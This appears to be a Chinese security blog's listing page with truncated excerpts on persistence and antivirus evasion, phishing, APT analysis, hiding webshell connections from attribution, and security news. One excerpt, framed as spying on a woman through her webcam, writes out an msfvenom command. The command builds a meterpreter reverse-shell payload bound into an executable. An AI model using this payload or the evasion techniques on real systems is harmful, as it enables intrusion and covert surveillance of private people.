登陆 注册
  • 自用渗透工具资源列表

    桑云信息Lzers桑云信息Lzers 2021-08-12

    爆破脚本/工具名称               简介Github地址t14m4t自动探测开放端口并暴力破解攻击。https://github.com/MS-WEB-BN/t14m4t信息搜集名称简介Github地址AppInfoScanner对android、ios、web文件/...

  • 干货 | 巧用cpl文件维持权限和免杀

    shaqianshaqian 2021-08-12

    前言最近无意间发现了cpl文件,之前对该类型的文件了解几乎为零,由于触及到我的知识盲区,于是决定探究。cpl文件CPL文件,是Windows控制面板扩展项,CPL全拼为Control Panel Item 在system32目录下有一系列的cpl文件,分别对应着各种控制面板的子选项列入我们win+R输入main.cpl将会打开控制面板中的鼠标属性c...

  • LuminousMoth样本分析报告

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言2021年7月,卡巴斯基发现一种针对东南亚的攻击活动,被称作LuminoutMoth。该活动至少可以追溯到2020年10月,早期的攻击大多在缅甸但现在主要在菲律宾,目前发现缅甸共有100多名受害者,菲律宾有1,400名受害者,其中一些受害者是政府实体。源头APT组织向受害者发送包含Dropbox下载链接的钓鱼邮件,通过将file_subpath参数设置为...

  • 一次渗透妹子电脑开摄像头全过程

    桑云信息安云桑云信息安云 2021-07-27

    具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...

  • 关于快速验证低危与中危漏洞

    桑云信息安云桑云信息安云 2021-07-27

    漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。按照危害也被分为高、中、低三种。低危X-Frame-Options Header未配置查看请求头中是否存在X-Frame-Options Header字段http://google.com会话Cookie中缺少secure属性(未设置安全标志的Cookie)...

  • 东京奥运会出现148个钓鱼网站 门票购票者及志愿者信息泄露

    桑云信息Lzers桑云信息Lzers 2021-07-27

    据媒体报道,一位日本早稻田大学教授称已出现1753个与东京奥运会和残奥会官方网站相类似的域名,其中148个可能被以盗取个人信息等为目的的恶意虚假网站所使用。报道指出,调查组调查了截至举办开幕式的23日获取的含有“tokyo”、“2020”、“olympic”等多个单词的可能被误认为官方网站的域名数。在1753个域名中,有148个域名很可能是浏览后会感染电脑病...

  • 电商老板转行开卡业务员,疯狂盗取公民“人脸信息”被宁波警方抓获

    桑云信息Lzers桑云信息Lzers 2021-07-27

    家住海曙的邓先生前段时间经历了一场由普通人到诈骗嫌疑人又到受害人的三重身份转变,而这一波三折的身份变化都是在邓先生毫不知情的情况下发生的。到底怎么回事?这一切还要从邓先生一张无辜被“盗”的脸说起↓↓↓今年2月,手机卡办理专员小谢和小俞敲开了邓先生家的门,他们向邓先生热情介绍了新卡套餐,面对“无限流量”“充值返现”“超低月租费”等优惠力度,邓先生一下子就动了心...

  • 干货 | 邮件钓鱼攻击学习

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。钓鱼手段Lnk(快捷方式)可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD当我点击谷歌浏览器时,弹出了CMD可以进行更改图标快速...

  • 【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

    桑云信息Lzers桑云信息Lzers 2021-07-26

    前言用过云函数的 XD 们都知道,它可以用来帮助我们转发请求,但是这种方法已经被老外玩烂了,但是也很实用!由于它自带 CDN 这样我们每次请求 Webshell 的时候 IP 都是不同的,从而达到隐藏 RT 的效果!还是那句话,一个合格的 RedTeam 被溯源到是很可耻的!如何优雅的隐藏你连接 Webshell 的真实 IP云函数隐藏 Websh...

  • 一张图就是一份木马?谨防游戏交易诈骗

    桑云信息Lzers桑云信息Lzers 2021-07-21

    在这个瓜田里猹乱窜的炎炎暑假相信很多已经从学校跑路的网瘾少年正在愉快地吹着空调打着游戏吃着瓜而据《2020老年人互联网生活报告》数据显示还有10万网瘾老人日均在线超过10个小时带着老花镜围观中国汉字新解当然勤奋的骗子也摩拳擦掌等候多时了无论是游戏账号交易,还是虚拟物品交易,层层的套路陷阱已为网瘾老少爷们儿铺展开望诸君保持清醒,举一反三,victory!1小时...

请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net